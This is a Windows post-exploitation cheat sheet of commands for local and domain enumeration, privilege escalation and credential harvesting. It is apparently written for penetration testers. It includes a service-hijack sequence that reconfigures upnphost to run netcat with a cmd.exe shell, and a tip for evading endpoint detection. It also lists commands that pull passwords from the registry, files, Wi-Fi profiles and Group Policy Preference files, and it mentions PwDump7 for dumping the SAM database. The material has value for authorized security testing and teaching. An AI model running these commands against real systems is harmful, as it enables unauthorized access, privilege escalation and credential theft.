Local Recon and Enumeration


# Powershell whoami

# Display hidden files
dir /a 

# Recursive dir
dir /s

# If you can't change into a folder because its name contains a space,
# use the old 8.3 short-name trick:
# the short name is at most 8 characters followed by ~N
cmd> cd progra~1
cmd> cd progra~2

Enumeration - Host Information

# Exact OS version
type C:/Windows/system32/eula.txt

type C:\Windows\System32\drivers\etc\hosts
# OS Arch
wmic qfe

# Environment variables? Is the DC set as the logon server?
powershell> Get-ChildItem Env: | ft Key,Value

# Other connected drives?
net use
wmic logicaldisk get caption,description,providername
powershell> Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root

Enumeration - Network

# NIC Connected
ipconfig /all
powershell> Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
powershell> Get-DnsClientServerAddress -AddressFamily IPv4 | ft

# Routes
route print
powershell> Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex

# ARP Cache
arp -a
powershell> Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State

# Connection to other hosts
netstat -ano

# Hosts file

# Firewall
netsh advfirewall show allprofiles state
netsh advfirewall firewall show rule name=all
netsh advfirewall export "firewall.txt"

# Is SNMP configured?
reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s
powershell> Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse

Enumeration - Users & Groups

# SID for local user or logged in local user
wmic useraccount where name='username' get sid
wmic useraccount where name='%username%' get sid

# SID for current logged in domain user
whoami /user

# SID for local administrator
wmic useraccount where (name='administrator' and domain='%computername%') get name,sid

# SID for domain administrator
wmic useraccount where (name='administrator' and domain='%userdomain%') get name,sid

# Find a username from a SID
wmic useraccount where sid='S-1-3-12-1234525106-3567804255-30012867-1437' get name

# List the current token's privileges and look for any of these:
# SeBackupPrivilege, SeDebugPrivilege, SeTakeOwnershipPrivilege, SeTcbPrivilege,
# SeCreateTokenPrivilege, SeLoadDriverPrivilege, SeImpersonatePrivilege
whoami /priv
net users
dir /b /ad “C:\Documents and Settings”
reg query “HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon” 2>nul | findstr “DefaultUserName DefaultDomainName DefaultPassword”
net user alice
echo %username%

# Get all users (old users?)
net users
dir /b /ad "C:\Users\"
dir /b /ad "C:\Documents and Settings\" # Windows XP and below
powershell> Get-LocalUser | ft Name,Enabled,LastLogon
powershell> Get-ChildItem C:\Users -Force | select Name

# Information about all local users
powershell> Get-WmiObject  -Class Win32_UserAccount  -Filter "LocalAccount=1" | % {net user $_.Name}
powershell> Get-LocalUser | %{net user $_.name}

# Logged on users

# Groups
powershell> Get-LocalGroup | ft Name
powershell> Get-LocalGroupMember Administrators | ft Name, PrincipalSource

# Get domain
powershell> wmic computersystem get domain
powershell> systeminfo | findstr /B /C:"Domain"

# Domain
# The abbreviated /dom switch may avoid detection by endpoint security solutions
powershell> net user /dom
powershell> net user /domain
powershell> net user /domain <username>
powershell> net group /domain

# Get your own SID
powershell> wmic useraccount where name='<username>' get sid
# Registry for user autologon ?
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"
powershell> Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon' | select "Default*"

# Credential Manager ? 
cmdkey /list
dir C:\Users\username\AppData\Local\Microsoft\Credentials\
dir C:\Users\username\AppData\Roaming\Microsoft\Credentials\
powershell> Get-ChildItem -Hidden C:\Users\username\AppData\Local\Microsoft\Credentials\
powershell> Get-ChildItem -Hidden C:\Users\username\AppData\Roaming\Microsoft\Credentials\
# Get domain SPN
$search = New-Object DirectoryServices.DirectorySearcher([ADSI]"")
$search.filter = "(servicePrincipalName=*)"
$results = $search.Findall()
foreach($result in $results)
    $userEntry = $result.GetDirectoryEntry()
    Write-host "User : " $userEntry.name "(" $userEntry.distinguishedName ")"
    Write-host "SPNs"        
    foreach($SPN in $userEntry.servicePrincipalName)
    Write-host ""

# Get user accounts which have SPN
$search = New-Object DirectoryServices.DirectorySearcher([ADSI]"")
$search.filter = "(&(objectCategory=person)(objectClass=user)(servicePrincipalName=*))"
$results = $search.Findall()
foreach($result in $results)
    $userEntry = $result.GetDirectoryEntry()
    Write-host "User : " $userEntry.name "(" $userEntry.distinguishedName ")"
    Write-host "SPNs"        
    foreach($SPN in $userEntry.servicePrincipalName)
    Write-host ""
# WMIC help
wmic /?

# Patch level
wmic qfe get Caption,Description,HotFixID,InstalledOn
# Grep for particular patch
wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB.." /C:"KB.."

# Check typical files for passwords

# SYSVOL passwords... (msf or powersploit)
# Other files that can contain passwords

Enumeration - Programs, Processes and Services

tasklist /SVC
schtasks /query /fo LIST /v
net start
accesschk_old.exe -uwcqv “Authenticated Users” * /accepteula
accesschk_old.exe -ucqv upnphost
sc qc upnphost
sc config upnphost binpath= “C:\Windows\Temp\nc.exe -nv 51337 -e C:\Windows\System32\cmd.exe”
sc config upnphost obj= “.\LocalSystem” password= “”
net stop upnphost
net start upnphost

Installed Software and permissions

# Get installed software
dir /a "C:\Program Files"
dir /a "C:\Program Files (x86)"
powershell> Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | ft Parent,Name,LastWriteTime
powershell> Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name

# Full permissions for everyone or users ?
icacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "Everyone"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "Everyone"
icacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"

# Also possible to do it using accesschk from sysinternals
accesschk.exe -qwsu "Everyone" *
accesschk.exe -qwsu "Authenticated Users" *
accesschk.exe -qwsu "Users" *

Processes and Services

# Get processes and services
tasklist /svc
tasklist /v
net start
sc query

powershell> Get-Process | where {$_.ProcessName -notlike "svchost*"} | ft ProcessName, Id
powershell> Get-Service
powershell> Get-WmiObject -Query "Select * from Win32_Process" | where {$_.Name -notlike "svchost*"} | Select Name, Handle, @{Label="Owner";Expression={$_.GetOwner().User}} | ft -AutoSize

# Weak or reconfigurable services?
accesschk.exe -uwcqv "Everyone" *
accesschk.exe -uwcqv "Authenticated Users" *
accesschk.exe -uwcqv "Users" *

# Service list (verbose output)
wmic service list
for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> c:\windows\temp\permissions.txt
for /f eol^=^"^ delims^=^" %a in (c:\windows\temp\permissions.txt) do cmd.exe /c icacls "%a"
# Any unquoted service paths?
wmic service get name,displayname,pathname,startmode 2>nul |findstr /i "Auto" 2>nul |findstr /i /v "C:\Windows\\" 2>nul |findstr /i /v """
powershell> gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name
# Scheduled Tasks
schtasks /query /fo LIST 2>nul | findstr TaskName
dir C:\windows\tasks
powershell> Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
# Startup
wmic startup get caption,command
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
dir "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
dir "C:\Documents and Settings\%username%\Start Menu\Programs\Startup"

powershell> Get-CimInstance Win32_StartupCommand | select Name, command, Location, User | fl
powershell> Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run'
powershell> Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce'
powershell> Get-ItemProperty -Path 'Registry::HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run'
powershell> Get-ItemProperty -Path 'Registry::HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce'
powershell> Get-ChildItem "C:\Users\All Users\Start Menu\Programs\Startup"
powershell> Get-ChildItem "C:\Users\$env:USERNAME\Start Menu\Programs\Startup"
# Dump process memory from PowerShell
# Powershell procdump

Enumeration - Files

dir /a /s *pass* == *cred* == *vnc* == *.config* == *proof.txt* == *local.txt*
findstr /si password *.xml *.ini *.txt *.config *.sql *.php *.asp *.jsp *.bat *.vbs 2>nul
type “C:\Documents and Settings\Administrator\Desktop\proof.txt”
# Passwords in the registry
reg query HKCU /f password /t REG_SZ /s
reg query HKLM /f password /t REG_SZ /s 
# Unattended files or sysprep not cleaned ?
dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul
powershell> Get-Childitem –Path C:\ -Include *unattend*,*sysprep* -File -Recurse -ErrorAction SilentlyContinue | where {($_.Name -like "*.xml" -or $_.Name -like "*.txt" -or $_.Name -like "*.ini")}
# On IIS, what's in inetpub, web.config ?
dir /a C:\inetpub\
dir /s web.config
powershell> Get-Childitem –Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue

# IIS logs
# XAMPP, Apache, or PHP, configuration files ? 
dir /s php.ini httpd.conf httpd-xampp.conf my.ini my.cnf
powershell> Get-Childitem –Path C:\ -Include php.ini,httpd.conf,httpd-xampp.conf,my.ini,my.cnf -File -Recurse -ErrorAction SilentlyContinue
# Interesting files ? 
dir /s *pass* == *vnc* == *.config* 2>nul
powershell> Get-Childitem –Path C:\Users\ -Include *password*,*vnc*,*.config -File -Recurse -ErrorAction SilentlyContinue

# Files containing password ?
findstr /si password *.xml *.ini *.txt *.config 2>nul
powershell> Get-ChildItem C:\* -include *.xml,*.ini,*.txt,*.config -Recurse -ErrorAction SilentlyContinue | Select-String -Pattern "password"


# Group Policy Preference
# Output environment-variables

# Look for the following:

# Look up the IP address
nslookup nameofserver.whatever.local

# It will output something like this

# Now we mount it
net use z: \\\SYSVOL

# And enter it

# Now we search for the groups.xml file
dir Groups.xml /s

Gathering Passwords/Hashes

reg query "HKCU\Software\ORL\WinVNC3\Password"

# Windows autologin
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"

# SNMP parameters
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"

# Putty
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"

# Search for password in registry
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
# You can find passwords in arbitrary files
findstr /si password *.txt
findstr /si password *.xml
findstr /si password *.ini

# Find all passwords in all files
findstr /spin "password" *.*

# Some common files to find them in
dir c:*vnc.ini /s /b
dir c:*ultravnc.ini /s /b
dir c:\ /s /b | findstr /si *vnc.ini

# Stuff in the registry
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password

# Search for passwords in the registry
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

# Search for files containing keywords
dir /s *pass* == *cred* == *vnc* == *.config*

# Interesting files
# Enumerate stored WiFi settings and get possible stored passwords
(netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "(Key Content|Contenu de la clé)\W+\:(.+)$" | %{$pass=$_.Matches.Groups[2].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize
.\PwDump7.exe (nécessite libay32.dll) => Dump SAM base
# SAM and SYSTEM files